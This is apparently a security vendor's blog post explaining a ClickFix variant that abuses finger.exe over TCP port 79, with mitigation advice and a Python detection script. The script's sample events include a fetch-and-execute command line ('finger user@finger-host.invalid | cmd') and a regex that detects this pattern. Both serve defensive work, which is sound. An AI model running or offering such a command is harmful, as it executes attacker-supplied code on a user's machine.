Understanding the New ClickFix Attack


Understanding the New ClickFix Attack: When “Verify You’re Human” Becomes the Threat

Cybercriminals are once again proving that the most effective attack surface isn’t software – it’s people.

A newly observed evolution of the ClickFix social‑engineering technique shows attackers abusing a decades‑old Windows tool called finger.exe to trick users into executing malicious code themselves. The danger lies not in a technical exploit, but in how convincingly attackers mimic routine online behaviour we’ve all become conditioned to trust.

What Is the ClickFix Attack?

ClickFix is a social‑engineering technique that revolves around fake CAPTCHA checks, browser errors, or “human verification” prompts. Instead of downloading malware directly, attackers instruct users to copy and paste commands into Windows Run, Command Prompt, or PowerShell, often claiming it will “fix” a problem or complete a security check.

Because the action is performed manually by the user and uses legitimate Windows tools, traditional security controls often struggle to distinguish the activity from normal behaviour. Put simply, the user becomes the execution mechanism.

What’s New About This Variant?

In this latest evolution, attackers are abusing finger.exe, a legitimate Windows networking utility that dates back to the early days of the internet. Originally designed to retrieve information about users on remote systems, it communicates over TCP port 79, a protocol few organisations actively monitor today.

Instead of retrieving user details, attacker‑controlled servers now respond with malicious commands, often encoded in Base64. These responses are silently executed once the user runs the instructed command, allowing malware to be deployed without any visible download.

Why This Works So Well

This attack succeeds because it exploits behavioural conditioning:

  • Users are familiar with CAPTCHA and “verify you’re human” checks
  • They trust built‑in Windows tools more than downloaded files
  • They are used to following on‑screen instructions to resolve errors quickly

By combining these factors, attackers bypass endpoint protection, web filtering, and even cautious user behaviour, all without exploiting a software vulnerability.

[Figure: example of a fake CAPTCHA page (Source: Internet Storm Center)]

Real‑World Campaigns Already Seen

Researchers have linked this technique to active malware campaigns such as KongTuke and SmartApeSG, which use fake verification pages to initiate the attack. Once executed, the payloads observed include:

  • Information stealers (credential and browser data theft)
  • Remote Access Trojans (RATs)
  • Follow‑on malware staged through additional downloads

Network analysis confirms outbound traffic on TCP port 79 retrieving malicious instructions disguised as legitimate finger responses.

What This Means for Businesses

For organisations, this attack highlights a critical reality: technical controls alone are not enough.

Even fully patched systems with modern EDR tools can be compromised if users are socially engineered into running commands themselves. This is especially concerning because:

  • The technique uses legitimate system binaries (“living off the land”)
  • No exploit or malicious attachment is required
  • Actions may appear legitimate in audit logs

Security teams must now consider user‑driven execution as a primary risk vector.

How Organisations Can Reduce Risk

At Information Solutions, we recommend a layered response:

  • User awareness training focused on fake verification and CAPTCHA abuse
  • Blocking or monitoring legacy protocols such as TCP port 79 where not required
  • Restricting access to Run, PowerShell, and CMD where business‑appropriate
  • Adopting strong endpoint detection that flags unusual command‑line behaviour
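As an added illustration of the two monitoring points above (outbound TCP port 79 traffic, and unusual command lines around finger.exe), the following detection logic is example code written for this page, not from Information Solutions or the cited researchers. It runs over constructed Sysmon-style events; the field names follow Sysmon process-creation (EventID 1) and network-connection (EventID 3) records, and the hostnames and IP addresses are placeholders.

```python
import re

# Constructed sample telemetry (hypothetical, not from the article).
# EventID 1 = process creation, EventID 3 = network connection.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe",          # explorer.exe = launched from the Run box
     "CommandLine": r"cmd /c finger user@finger-host.invalid | cmd"},
    {"EventID": 1, "Image": r"C:\Windows\System32\finger.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"finger user@finger-host.invalid"},
    {"EventID": 3, "Image": r"C:\Windows\System32\finger.exe",
     "DestinationIp": "203.0.113.10", "DestinationPort": 79},
    {"EventID": 1, "Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "notepad.exe"},
    {"EventID": 3, "Image": r"C:\Program Files\Browser\browser.exe",
     "DestinationIp": "203.0.113.20", "DestinationPort": 443},
]

# Parents that indicate a user typed the command (shell, Run box) rather than a scheduled job.
USER_LAUNCHERS = ("cmd.exe", "powershell.exe", "pwsh.exe", "explorer.exe")
# finger output being piped into a command interpreter is the key ClickFix pattern.
PIPE_TO_SHELL = re.compile(r"finger(\.exe)?\b.*\|\s*(cmd|powershell|pwsh)\b", re.IGNORECASE)


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return (severity, reason) for a suspicious event, or None for benign ones."""
    if event["EventID"] == 1:
        if PIPE_TO_SHELL.search(event.get("CommandLine", "")):
            return ("high", "finger output piped into a command interpreter")
        if basename(event["Image"]) == "finger.exe":
            if basename(event.get("ParentImage", "")) in USER_LAUNCHERS:
                return ("high", "finger.exe launched interactively by a user")
            return ("medium", "finger.exe executed (rarely used legacy utility)")
    elif event["EventID"] == 3 and event.get("DestinationPort") == 79:
        severity = "high" if basename(event["Image"]) == "finger.exe" else "medium"
        return (severity, f"outbound TCP/79 to {event['DestinationIp']}")
    return None


def scan(events):
    """Apply classify() to every event and return the alerts in log order."""
    alerts = []
    for event in events:
        verdict = classify(event)
        if verdict:
            alerts.append((event["EventID"], basename(event["Image"]), *verdict))
    return alerts
```

On the sample data, scan() raises three alerts and stays silent on the notepad and HTTPS events; in production the TCP/79 rule should be tuned against any legitimate finger use before being set to block.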

Most importantly, users should be taught a simple rule:
No legitimate website will ever ask you to paste commands into your computer.

Looking Ahead

The abuse of finger.exe is a reminder that attackers don’t need zero‑days when they can rely on trust, familiarity, and habit. As cyber threats continue to evolve, security awareness must evolve with them, focusing as much on human behaviour as on systems and software.

If you’d like help reviewing your organisation’s exposure to social‑engineering threats, Information Solutions is here to help.